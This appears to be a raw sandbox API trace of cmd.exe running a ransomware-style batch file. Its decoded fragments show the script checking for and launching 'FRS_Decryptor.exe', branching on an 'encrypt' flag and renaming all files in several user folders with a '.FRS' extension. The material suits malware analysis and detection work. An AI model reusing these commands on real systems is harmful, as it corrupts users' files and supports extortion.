lpMode=0x12b5154) returned 1 [0093.644] _get_osfhandle (_FileHandle=0) returned 0x24 [0093.644] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0093.644] SetConsoleInputExeNameW () returned 0x1 [0093.644] GetConsoleOutputCP () returned 0x1b5 [0093.644] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0093.644] SetThreadUILanguage (LangId=0x0) returned 0x409 [0093.644] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0093.644] _open_osfhandle (_OSFileHandle=0x2a0, _Flags=8) returned 3 [0093.645] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0093.645] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0093.645] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0093.645] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0093.645] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0093.645] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0093.645] GetFileType (hFile=0x2a0) returned 0x1 [0093.645] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0093.645] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0093.645] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0093.645] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0093.645] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0093.645] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0093.645] GetFileType (hFile=0x2a0) returned 0x1 [0093.645] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0093.645] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0093.645] _tell (_FileHandle=3) returned 2627 [0093.646] _close (_FileHandle=3) returned 0 [0093.646] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0093.646] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0093.646] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0093.646] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0093.646] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0093.649] feof (_File=0x76ea4c68) returned 0 [0093.650] ferror (_File=0x76ea4c68) returned 0 [0093.650] fgets (in: _Buf=0xd82fd8, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0094.116] feof (_File=0x76ea4c68) returned 0 [0094.116] ferror (_File=0x76ea4c68) returned 0 [0094.116] fgets (in: _Buf=0xd86c3e, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0094.153] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0094.154] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43b46, cbMultiByte=78, lpWideCharStr=0xd43af8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0094.154] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0094.154] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0094.154] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.154] _open_osfhandle (_OSFileHandle=0x158, _Flags=8) returned 3 [0094.154] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.154] SetFilePointer (in: hFile=0x158, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0094.154] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.155] GetFileSize (in: hFile=0x158, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0094.155] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0094.155] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.155] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0094.155] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.155] GetFileType (hFile=0x158) returned 0x1 [0094.155] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0094.155] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0094.155] SetFilePointer (in: hFile=0x158, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0094.155] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0094.155] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0094.155] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.155] GetFileType (hFile=0x158) returned 0x1 [0094.155] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0094.155] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0094.155] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0094.155] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0094.155] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.155] GetFileType (hFile=0x158) returned 0x1 [0094.155] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0094.155] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0094.155] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.155] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.155] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.155] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.155] GetFileType (hFile=0x158) returned 0x1 [0094.155] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.155] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.155] SetFilePointer (in: hFile=0x158, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0094.155] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0094.156] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0094.156] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.156] GetFileType (hFile=0x158) returned 0x1 [0094.156] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0094.156] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.156] SetFilePointer (in: hFile=0x158, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0094.156] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0094.156] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0094.156] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.156] GetFileType (hFile=0x158) returned 0x1 [0094.156] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0094.156] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.156] SetFilePointer (in: hFile=0x158, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0094.156] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0094.156] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0094.156] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.156] GetFileType (hFile=0x158) returned 0x1 [0094.156] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0094.156] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.156] SetFilePointer (in: hFile=0x158, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0094.156] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0094.156] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0094.156] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.156] GetFileType (hFile=0x158) returned 0x1 [0094.156] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0094.156] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.156] SetFilePointer (in: hFile=0x158, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0094.156] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0094.156] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0094.156] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.156] GetFileType (hFile=0x158) returned 0x1 [0094.156] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0094.157] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.157] SetFilePointer (in: hFile=0x158, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0094.157] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0094.157] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0094.157] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.157] GetFileType (hFile=0x158) returned 0x1 [0094.157] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0094.157] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.157] SetFilePointer (in: hFile=0x158, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0094.157] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0094.157] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0094.157] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.157] GetFileType (hFile=0x158) returned 0x1 [0094.157] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0094.157] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.157] SetFilePointer (in: hFile=0x158, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0094.157] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0094.157] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0094.157] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.157] GetFileType (hFile=0x158) returned 0x1 [0094.157] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0094.157] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.157] SetFilePointer (in: hFile=0x158, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0094.157] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0094.157] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0094.157] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.157] GetFileType (hFile=0x158) returned 0x1 [0094.157] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0094.157] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.157] SetFilePointer (in: hFile=0x158, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0094.158] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0094.158] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0094.158] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.158] GetFileType (hFile=0x158) returned 0x1 [0094.158] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0094.158] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.158] SetFilePointer (in: hFile=0x158, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0094.158] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0094.158] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0094.158] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.158] GetFileType (hFile=0x158) returned 0x1 [0094.158] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0094.158] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.158] SetFilePointer (in: hFile=0x158, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0094.158] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0094.158] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0094.158] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.158] GetFileType (hFile=0x158) returned 0x1 [0094.158] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0094.158] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.158] SetFilePointer (in: hFile=0x158, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0094.158] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0094.158] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0094.158] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.158] GetFileType (hFile=0x158) returned 0x1 [0094.158] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0094.158] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.158] SetFilePointer (in: hFile=0x158, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0094.158] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0094.158] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0094.159] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.159] GetFileType (hFile=0x158) returned 0x1 [0094.159] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0094.159] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.159] SetFilePointer (in: hFile=0x158, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0094.159] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0094.159] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0094.159] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.159] GetFileType (hFile=0x158) returned 0x1 [0094.159] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0094.159] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, 